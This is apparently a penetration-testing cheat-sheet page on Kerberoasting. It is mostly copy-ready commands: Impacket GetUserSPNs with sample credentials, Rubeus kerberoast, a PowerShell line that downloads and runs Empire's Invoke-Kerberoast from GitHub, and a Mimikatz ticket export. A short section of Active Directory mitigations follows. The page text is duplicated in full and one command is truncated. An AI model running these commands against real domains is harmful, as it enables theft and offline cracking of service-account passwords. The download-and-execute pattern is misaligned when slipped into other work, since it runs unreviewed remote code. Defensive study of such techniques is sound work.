Kerberoasting

PreviousAS-REP Roasting NextKerberos Unconstrained Delegation

Last updated 4 months ago

Kerberoasting

the TGS encrypted using a password service account

The Kerberos session ticket (TGS) has a server portion that is encrypted with the password hash of the service account. This makes it possible to request a ticket and do an offline password attack

Linux

impacket-GetUsersSPNs hacktor.local/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast

impacket-GetUserSPNs remo.htb/'o.rashed':'MyP@ssw0rd!' -target-domain remo.htb -dc-ip 10.0.2.10 -request -request-user "m.nathan" -outputfile crackme.txt

Windows

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
#Using power-kerb
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")

nvoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

Enumeration

#Find user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-NetUser -SPN 
Get-DomainUser -SPN
#using impacket tools
impacket-GetUserSPNs hacktor.local/grey:digi@123 -dc-ip 192.168.1.50 -request

Rubeus

Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:svcadmin /simple
#Kerberoast all possible accounts
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Rubeus.exe kerberoast  /outfile:hashes.txt
#OR Native Command
Add-Type -AssemblyName System.IdentityModel ;New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/msp-sqlreport.msp.local"

mimikatz

Invoke-Mimikatz -Command '"kerberos::list /export"'

Kerberos Mitigations

In order to prevent or mitigate many of these Kerberos attacks a series of policies can be implemented. Some examples are the following:

Enable an strong password policy: First step is to avoid having weak passwords in domain user accounts. To achieve this an strong password policy should be implemented, by ensuring that complex password option is enabled on Active Directory domain. Moreover, blacklisting some common predictable terms in passwords as company names, year or months names.
Avoid accounts without pre-authentication: If it is no completely necessary, none account must have Kerberos pre-authentication enabled. In case that this cannot be avoided, take note of these special accounts and create pseudo-random passwords with high level of complexity.
Avoid executing services in behalf of account accounts: Avoid services that run in domain user account context. In case of using an special user account for launch domain services, generate an strong pseudo-random password for that account.
Verify PAC: Enable PAC verification in order to avoid attacks such as Silver Ticket. To enable this check set the value ValidateKdcPacSignature (DWORD) in subkey HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters to 1.
Change passwords periodically: Set policies to ensure that user passwords are periodically modified, for example, each 2 to 4 months. As special case, krbtgt account password should also be changed periodically, since that key is used to create TGTs. To this purpose, the script https://github.com/microsoft/New-KrbtgtKeys.ps1 can be used. It must be taken into account that krbtgt password must be modified twice to invalidate current domain tickets, for cache reasons. Another consideration is that the functional level of domain must be equal or higher than Windows Server 2008 in order to manipulate krbtgt account credentials.
Disable Kerberos weak encryption types: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption as RC4 should be monitored, due is usually used by attack tools.

Resources

PreviousAS-REP Roasting NextKerberos Unconstrained Delegation

Last updated 4 months ago

the TGS encrypted using a password service account

The Kerberos session ticket (TGS) has a server portion that is encrypted with the password hash of the service account. This makes it possible to request a ticket and do an offline password attack

Linux

impacket-GetUsersSPNs hacktor.local/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast

impacket-GetUserSPNs remo.htb/'o.rashed':'MyP@ssw0rd!' -target-domain remo.htb -dc-ip 10.0.2.10 -request -request-user "m.nathan" -outputfile crackme.txt

Windows

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
#Using power-kerb
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")

nvoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

Enumeration

#Find user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-NetUser -SPN 
Get-DomainUser -SPN
#using impacket tools
impacket-GetUserSPNs hacktor.local/grey:digi@123 -dc-ip 192.168.1.50 -request

Rubeus

Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:svcadmin /simple
#Kerberoast all possible accounts
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Rubeus.exe kerberoast  /outfile:hashes.txt
#OR Native Command
Add-Type -AssemblyName System.IdentityModel ;New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/msp-sqlreport.msp.local"

mimikatz

Invoke-Mimikatz -Command '"kerberos::list /export"'

Kerberos Mitigations

In order to prevent or mitigate many of these Kerberos attacks a series of policies can be implemented. Some examples are the following:

Enable an strong password policy: First step is to avoid having weak passwords in domain user accounts. To achieve this an strong password policy should be implemented, by ensuring that complex password option is enabled on Active Directory domain. Moreover, blacklisting some common predictable terms in passwords as company names, year or months names.
Avoid accounts without pre-authentication: If it is no completely necessary, none account must have Kerberos pre-authentication enabled. In case that this cannot be avoided, take note of these special accounts and create pseudo-random passwords with high level of complexity.
Avoid executing services in behalf of account accounts: Avoid services that run in domain user account context. In case of using an special user account for launch domain services, generate an strong pseudo-random password for that account.
Verify PAC: Enable PAC verification in order to avoid attacks such as Silver Ticket. To enable this check set the value ValidateKdcPacSignature (DWORD) in subkey HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters to 1.
Change passwords periodically: Set policies to ensure that user passwords are periodically modified, for example, each 2 to 4 months. As special case, krbtgt account password should also be changed periodically, since that key is used to create TGTs. To this purpose, the script https://github.com/microsoft/New-KrbtgtKeys.ps1 can be used. It must be taken into account that krbtgt password must be modified twice to invalidate current domain tickets, for cache reasons. Another consideration is that the functional level of domain must be equal or higher than Windows Server 2008 in order to manipulate krbtgt account credentials.
Disable Kerberos weak encryption types: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption as RC4 should be monitored, due is usually used by attack tools.

Resources

Download Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft, Version 1 and 2 from Official Microsoft Download CenterMicrosoft Store - Download Center